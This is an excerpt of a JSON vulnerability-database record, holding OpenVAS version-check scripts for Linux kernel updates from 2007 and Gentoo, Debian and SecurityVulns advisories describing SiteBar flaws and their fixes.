get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:48", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870177", "id": "OPENVAS:1361412562310870177", "title": "RedHat Update for kernel RHSA-2007:1104-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:1104-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-December/msg00018.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870177\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:1104-01\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:1104-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:38", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2007-0993", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122628", "title": "Oracle Linux Local Check: ELSA-2007-0993", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0993.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122628\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:49:43 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0993\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0993 - Important: kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0993\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0993.html\");\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~53.1.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:37", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-03-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870182", "id": "OPENVAS:1361412562310870182", "type": "openvas", "title": "RedHat Update for kernel RHSA-2007:0993-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:0993-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel handles the basic functions of the operating system.\n\n These new kernel packages contain fixes for the following security issues:\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch. A\n local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n A flaw was found in the handling of IEEE 802.11 frames affecting several\n wireless LAN modules. In certain circumstances, a remote attacker could\n trigger this flaw by sending a malicious packet over a wireless network and\n cause a denial of service (kernel crash). (CVE-2007-4997, Important). \n \n A flaw was found in the Advanced Linux Sound Architecture (ALSA). A local\n user who had the ability to read the /proc/driver/snd-page-alloc file could\n see portions of kernel memory. (CVE-2007-4571, Moderate). \n \n In addition to the security issues described above, several bug fixes\n preventing possible memory corruption, system crashes, SCSI I/O fails,\n networking drivers performance regression and journaling block device layer\n issue were also included.\n \n Red Hat Enterprise Linux 5 users are advised to upgrade to these packages,\n which contain backported patches to resolve these issues.\n \n Red Hat would like to credit Vasily Averin, Chris Evans, and Neil Kettle \n for reporting the security issues corrected by this update.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-November/msg00001.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870182\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:0993-01\");\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:0993-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~53.1.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:58", "bulletinFamily": "unix", "description": "### Background\n\nSiteBar is a PHP application that allows users to store their bookmarks on a web server. \n\n### Description\n\nTim Brown discovered these multiple issues: the translation module does not properly sanitize the value to the \"dir\" parameter (CVE-2007-5491, CVE-2007-5694); the translation module also does not sanitize the values of the \"edit\" and \"value\" parameters which it passes to eval() and include() (CVE-2007-5492, CVE-2007-5693); the log-in command does not validate the URL to redirect users to after logging in (CVE-2007-5695); SiteBar also contains several cross-site scripting vulnerabilities (CVE-2007-5692). \n\n### Impact\n\nAn authenticated attacker in the \"Translators\" or \"Admins\" group could execute arbitrary code, read arbitrary files and possibly change their permissions with the privileges of the user running the web server by passing a specially crafted parameter string to the \"translator.php\" file. An unauthenticated attacker could entice a user to browse a specially crafted URL, allowing for the execution of script code in the context of the user's browser, for the theft of browser credentials or for a redirection to an arbitrary web site after login. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll SiteBar users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/sitebar-3.3.9\"", "modified": "2007-11-06T00:00:00", "published": "2007-11-06T00:00:00", "id": "GLSA-200711-05", "href": "https://security.gentoo.org/glsa/200711-05", "type": "gentoo", "title": "SiteBar: Multiple issues", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:30", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1423-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nDecember 07, 2007 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : sitebar\nVulnerability : various\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2007-5491, CVE-2007-5492, CVE-2007-5693, CVE-2007-5694, CVE-2007-5695, CVE-2007-5692\nDebian Bug : 447135, 448690, 448689\n\nSeveral remote vulnerabilities have been discovered in sitebar, a\nweb based bookmark manager written in PHP. The Common Vulnerabilities\nExposures project identifies the following problems:\n\nCVE-2007-5491\n A directory traversal vulnerability in the translation module allows\n remote authenticated users to chmod arbitrary files to 0777 via ".."\n sequences in the lang parameter.\n\nCVE-2007-5492\n A static code injection vulnerability in the translation module allows\n a remote authenticated user to execute arbitrary PHP code via the value\n parameter.\n\nCVE-2007-5693\n An eval injection vulnerability in the translation module allows\n remote authenticated users to execute arbitrary PHP code via the\n edit parameter in an upd cmd action.\n\nCVE-2007-5694\n A path traversal vulnerability in the translation module allows\n remote authenticated users to read arbitrary files via an absolute\n path in the 'dir' parameter.\n\nCVE-2007-5695\n An error in command.php allows remote attackers to redirect users\n to arbitrary web sites via the forward parameter in a Log In action.\n\nCVE-2007-5692\n Multiple cross site scripting flaws allow remote attackers to inject\n arbitrary script or HTML fragments into several scripts.\n\n\nFor the stable distribution (etch), these problem have been fixed in version\n3.3.8-7etch1.\n\nFor the old stable distribution (sarge), these problems have been fixed in\nversion 3.2.6-7.1sarge1\n\nFor the unstable distribution (sid), these problems have been fixed in version\n3.3.8-12.1.\n\nWe recommend that you upgrade your sitebar package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1.diff.gz\n Size/MD5 checksum: 12821 c38ed9e586c8b07b23349588f2be23b2\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6.orig.tar.gz\n Size/MD5 checksum: 333352 a86243f7a70a1a9ac80342fbcca14297\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1.dsc\n Size/MD5 checksum: 580 7654849ce1ea822b9b70c52a98def837\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1sarge1_all.deb\n Size/MD5 checksum: 341570 6e106cf5dddb0ee63f29efdcf93d8d74\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1.dsc\n Size/MD5 checksum: 583 8af7750ff9a808798bf1b898c69b84d6\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1.diff.gz\n Size/MD5 checksum: 22552 cdc186193c2ad2d4e69f220dd8372ccd\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8.orig.tar.gz\n Size/MD5 checksum: 686944 fa7b5367808966c8db6241f475f3ef2f\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.3.8-7etch1_all.deb\n Size/MD5 checksum: 709524 16eb8791acea7cf1c99ac61b7b47e4b1\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2007-12-07T00:00:00", "published": "2007-12-07T00:00:00", "id": "DEBIAN:DSA-1423-1:8E33C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00204.html", "title": "[SECURITY] [DSA 1423-1] New sitebar packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-10-20T00:00:00", "published": "2007-10-20T00:00:00", "id": "SECURITYVULNS:VULN:8277", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8277", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "All,\r\n\r\nAs a result of a short security audit of SiteBar, a number of security holes \r\nwere found. The holes included code execution, a malicious redirect and \r\nmultiple cases of Javascript injection.\r\n\r\nAfter liasing with the developers, the holes have been patched. Attached are \r\nthe advisory and patch relating to these flaws.\r\n\r\nCVEs open already relating to this audit:\r\n\r\n* CVE-2006-3320 (Javascript injection) - previously reported by other parties \r\nbut not resolved and so included for completeness\r\n\r\n* CVE-2007-5492 (code execution) - first reported in my attached advisory to \r\nthe vendor, independently rediscovered by Robert Buchholz of Gentoo whilst \r\nauditing the differences between the patched and unpatched versions (3.3.8 vs \r\n3.3.9)\r\n\r\n* CVE-2007-5491 (file permissions issue) - apparently patched by the vendor at \r\nthe same time as my issues were resolved and discovered by Robert Buchholz of \r\nGentoo whilst auditing the differences between the patched and unpatched \r\nversions (3.3.8 vs 3.3.9)\r\n\r\nIt is intended that CVE-2007-5492 will be updated to reference both code \r\nexecution flaws I reported. All other issues in the advisory have been \r\npatched but no CVEs have yet been requested or assigned to the best of my \r\nknowledge.\r\n\r\nTim\r\n-- \r\nTim Brown\r\n<mailto:timb@nth-dimension.org.uk>\r\n<http://www.nth-dimension.org.uk/>", "modified": "2007-10-20T00:00:00", "published": "2007-10-20T00:00:00", "id": "SECURITYVULNS:DOC:18237", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18237", "title": "Serious holes affecting SiteBar 3.3.8", 